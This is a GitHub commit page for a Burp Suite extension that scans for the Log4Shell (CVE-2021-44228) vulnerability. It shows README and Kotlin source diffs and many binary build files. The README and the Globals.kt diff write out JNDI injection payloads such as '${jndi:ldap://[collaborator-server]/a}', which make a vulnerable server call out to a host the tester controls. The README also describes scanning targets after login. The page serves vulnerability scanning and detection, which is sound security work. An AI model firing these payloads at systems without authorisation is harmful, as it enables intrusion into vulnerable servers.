Skip to content

Commit

Permalink
commit v0.2.0
Browse files Browse the repository at this point in the history
  • Loading branch information
0xDexter0us committed Dec 25, 2021
1 parent 6847c3e commit 83c5178
Show file tree
Hide file tree
Showing 116 changed files with 331 additions and 485 deletions.
Binary file not shown.
Empty file.
Binary file removed .gradle/7.1/executionHistory/executionHistory.bin
Binary file not shown.
Binary file removed .gradle/7.1/executionHistory/executionHistory.lock
Binary file not shown.
Binary file removed .gradle/7.1/fileChanges/last-build.bin
Binary file not shown.
Binary file removed .gradle/7.1/fileHashes/fileHashes.bin
Binary file not shown.
Binary file removed .gradle/7.1/fileHashes/fileHashes.lock
Binary file not shown.
Empty file removed .gradle/7.1/gc.properties
Empty file.
Binary file modified .gradle/7.3/executionHistory/executionHistory.bin
Binary file not shown.
Binary file modified .gradle/7.3/executionHistory/executionHistory.lock
Binary file not shown.
Binary file modified .gradle/7.3/fileHashes/fileHashes.bin
Binary file not shown.
Binary file modified .gradle/7.3/fileHashes/fileHashes.lock
Binary file not shown.
Binary file modified .gradle/buildOutputCleanup/buildOutputCleanup.lock
Binary file not shown.
Binary file modified .gradle/buildOutputCleanup/outputFiles.bin
Binary file not shown.
Binary file modified .gradle/file-system.probe
Binary file not shown.
1 change: 1 addition & 0 deletions .idea/gradle.xml

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

43 changes: 24 additions & 19 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -3,14 +3,17 @@
Log4J Scanner
</h1>

<h4 align="center">Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.</h4>
<h4 align="center">Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability with custom payloads.</h4>

---

<p align="center">
<a href="https://github.com/0xDexter0us/Log4J-Scanner/releases">
<img src="https://img.shields.io/github/release/0xDexter0us/Log4J-Scanner.svg">
</a>
<a href="https://github.com/0xDexter0us/Log4J-Scanner/releases">
<img src="https://img.shields.io/github/downloads/0xDexter0us/Log4J-Scanner/total?label=downloads&logo=github&color=inactive">
</a>
<a href="https://github.com/0xDexter0us/Log4J-Scanner/">
<img src="https://img.shields.io/github/stars/0xDexter0us/Log4J-Scanner.svg?style=social&label=Stars">
</a>
Expand All @@ -31,28 +34,25 @@
> I am not responsible for your actions, burp-suite freezing, target getting hacked, thermonuclear war, or the current economic crisis caused by you following these directions. YOU are choosing to use this tool, and if you point your finger at me for messing anything up, I will LMAO at you.
---
![Log4J-Scanner](https://github.com/0xDexter0us/Log4J-Scanner/images/log4j-scanner.png)
![Usage Gif](https://github.com/0xDexter0us/Log4J-Scanner/images/useage.gif)

## Instructions:
- Add a DNS token from any service you prefer [interact.sh](https://app.interactsh.com), [pipedream](https://pipedream.com), [canarytokens](https://canarytokens.org), [dnslog.cn](https://dnslog.cn) or burp collaborator.
- Either select one of the pre-defined payload or add a custom payload.
- Add custom payload as: `${jndi:ldap://[dnstoken]/[random]` as `dnstoken`and `random` are place-holders, also remember __NOT__ to add `}`closing curly bracket.
- Select location for payload insertion, headers or parameters or both.
- For post-auth scanning add the complete cookie, auth header. Eg: `Authorization: Bearer ya29.m.CvkBAd1XLWYfLkuHFIuOYFCfcGI137rr...`
- Hit **Hack The Planet** button.
- Install the extension either from pre-compiled releases or build from source.
- Disable/Uncheck all other active scanning extensions like active scan++, burp bounty pro, param-miner etc.
- From Top-Menu open settings of Log4J Scanner.
- Add your custom payload and save settings.
- Select your target > right-click > Scan.
- Select `Scan Configuration` > `Select from library`
- Only select `Audit checks - extensions only` and hit OK button.

### Important instructions to remember:
Special thanks to [Silent Signal](https://github.com/silentsignal), instructions and scan configurations are inspired from his extension.

- You'll need [Logger++](https://github.com/nccgroup/LoggerPlusPlus) or [Flow](https://github.com/hvqzao/burp-flow) extension to trace the request triggering the DNS callback.
- Remember to add this extension above [Logger++](https://github.com/nccgroup/LoggerPlusPlus) or [Flow](https://github.com/hvqzao/burp-flow) to track all out going requests.

![Burp-Externder](https://github.com/0xDexter0us/Log4J-Scanner/images/extender.png)

### How to track callbacks:
### Important instructions to remember:
- In your custom payload DO __NOT__ add your collaborator url, just add `[collaborator-server]` as a placeholder,
- `[collaborator-server` will be replaced by your collaborator server url itself.
- Example payload: `"${jndi:ldap://[collaborator-server]/a}`

- Payload triggering callback will contain a 6 character unique ID
- Example payload `${jndi:ldap://example.interact.sh/ABC123` where `ABC123` will be the unique ID
- You can search for this ID in [Logger++](https://github.com/nccgroup/LoggerPlusPlus) or [Flow](https://github.com/hvqzao/burp-flow) to trace the request.

## Download releases
`https://github.com/0xDexter0us/Log4J-Scanner/releases/`
Expand All @@ -72,17 +72,22 @@
## Resources

- For passive scanning: `https://github.com/f0ng/log4j2burpscanner`
- For active scanning: `https://github.com/albinowax/ActiveScanPlusPlus`
- For active scanning: `https://github.com/albinowax/ActiveScanPlusPlus` & `https://github.com/silentsignal/burp-log4shell`


## Changelog
**25 December 2021 - v0.2.0**
- Added Burp Collaborator api.
- Removed custom scanner.
- Added Burp scanner api.

**13 December 2021 - v.0.1.0**
**13 December 2021 - v0.1.0**
- First public release

## Thanks To

* CoreyD97 - https://github.com/CoreyD97
* Silent Signal - https://github.com/silentsignal


### This was coded be me within a day and is an initial release, bug might occur, bug reports, suggestions and pull requests all are welcome :)
Expand Down
4 changes: 1 addition & 3 deletions build.gradle
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@ plugins {
}

group 'com.dexter0us'
version '0.1.0'
version '0.2.0'

repositories {
mavenCentral()
Expand All @@ -14,8 +14,6 @@ dependencies {
implementation 'net.portswigger.burp.extender:burp-extender-api:2.3'
implementation 'com.miglayout:miglayout-core:5.3' //do not update, it will break
implementation 'com.miglayout:miglayout-swing:5.3' //do not update, it will break
implementation 'org.jetbrains.kotlinx:kotlinx-coroutines-core:1.5.2'
implementation 'org.jetbrains.kotlinx:kotlinx-coroutines-swing:1.5.2'
}

task fatJar(type: Jar) {
Expand Down
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
2 changes: 1 addition & 1 deletion build/kotlin/Log4JScanner010jar-classes.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/burp/BurpExtender.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Extension$Companion.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Extension$UI.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Extension.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/GlobalsKt$console$1.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/GlobalsKt.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JScanner$scanner$job$1.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JScanner.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JTab$1$1.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JTab$actionPerformed$1.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JTab.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JTabbkp.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/ProcessResult.class
/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/burp/BurpExtender.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Extension$Companion.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Extension.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/GlobalsKt$console$1.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/GlobalsKt.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JScanner$ScanIssue.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JScanner.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JUI.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/ProcessResult.class
Binary file modified build/kotlin/compileKotlin/build-history.bin
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/constants.tab
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/proto.tab
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/proto.tab.len
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/proto.tab_i
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/subtypes.tab
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/subtypes.tab_i
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/supertypes.tab
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
2 changes: 1 addition & 1 deletion build/kotlin/compileKotlin/caches-jvm/lookups/counters.tab
Original file line number Diff line number Diff line change
@@ -1,2 +1,2 @@
21
48
0
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/file-to-id.tab
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/file-to-id.tab.len
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/file-to-id.tab_i
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/id-to-file.tab
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/id-to-file.tab.len
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/id-to-file.tab_i
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/lookups.tab
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/lookups.tab.len
Binary file not shown.
Binary file not shown.
Binary file not shown.
Original file line number Diff line number Diff line change
@@ -1 +1 @@
��������̚̚̚
ν™υ¬ό°χ±ζ®ΜšΜšΜšτŸήΝέΕάΘίΛν²Ο°Ο°Ο°Ο°γ²φΈπ¶Β΄ΰµρΉΝ»Ϋ»
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/lookups.tab_i
Binary file not shown.
Binary file modified build/kotlin/compileKotlin/last-build.bin
Binary file not shown.
Binary file modified build/libs/Log4J-Scanner-0.1.0.jar
Binary file not shown.
Binary file removed images/extender.png
Binary file not shown.
Binary file removed images/log4j-scanner.png
Binary file not shown.
Binary file added images/useage.gif
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
47 changes: 35 additions & 12 deletions src/main/kotlin/com/dexter0us/log4jScanner/Extension.kt
Original file line number Diff line number Diff line change
Expand Up @@ -3,17 +3,20 @@ package com.dexter0us.log4jScanner
import burp.IBurpExtender
import burp.IBurpExtenderCallbacks
import burp.IExtensionStateListener
import burp.ITab
import java.awt.Component
import java.io.PrintWriter
import javax.swing.*

open class Extension: IBurpExtender, IExtensionStateListener {

companion object{
const val pluginName = "Log4J Scanner"
const val version = "0.1.0"
const val version = "0.2.0"
}

private var scavUnload = false
private var burpMenu: JMenuBar? = null
private var log4jMenu: JMenu? = null

override fun registerExtenderCallbacks(_callbacks: IBurpExtenderCallbacks) {
callbacks = _callbacks
helpers = _callbacks.helpers
Expand All @@ -22,22 +25,42 @@ open class Extension: IBurpExtender, IExtensionStateListener {

callbacks.apply {
setExtensionName(pluginName)
addSuiteTab(UI())
registerScannerCheck(Log4JScanner())
registerExtensionStateListener { extensionUnloaded() }
}

console("$pluginName v$version Loaded")
stdout.println("$pluginName v$version Loaded")

}
SwingUtilities.invokeLater {
try {
burpMenu = getBurpFrame()!!.jMenuBar
log4jMenu = JMenu("Log4J Scanner")
val listCustomTagsMenu = JMenuItem("Settings")
listCustomTagsMenu.addActionListener { Log4JUI() }
log4jMenu!!.add(listCustomTagsMenu)
burpMenu!!.add(log4jMenu)
} catch (e: Exception) {
e.printStackTrace()
}

}

override fun extensionUnloaded() {
currJob?.cancel()
console("Log4J scanner unloaded.")
}

private inner class UI : ITab{
override fun getTabCaption(): String = "Log4J Scanner"
override fun getUiComponent(): Component = Log4JTab()
private fun getBurpFrame(): JFrame? {
for (frame in JFrame.getFrames()) {
if (frame.isVisible && frame.title.startsWith("Burp Suite")) {
return frame as JFrame?
}
}
return null
}

override fun extensionUnloaded() {
currJob?.cancel()
stdout.println("Log4J scanner unloaded.")
scavUnload = true
burpMenu?.remove(log4jMenu)
burpMenu?.repaint()
}
}
2 changes: 2 additions & 0 deletions src/main/kotlin/com/dexter0us/log4jScanner/Globals.kt
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,8 @@ lateinit var stderr: PrintWriter

val console = { str: String -> stdout.println(str) }

var initialPayload = "\${jndi:ldap://[collaborator-server]/a}"

var historySize: Int = 100

var currJob: Job? = null
Expand Down
Loading

0 comments on commit 83c5178

Please sign in to comment.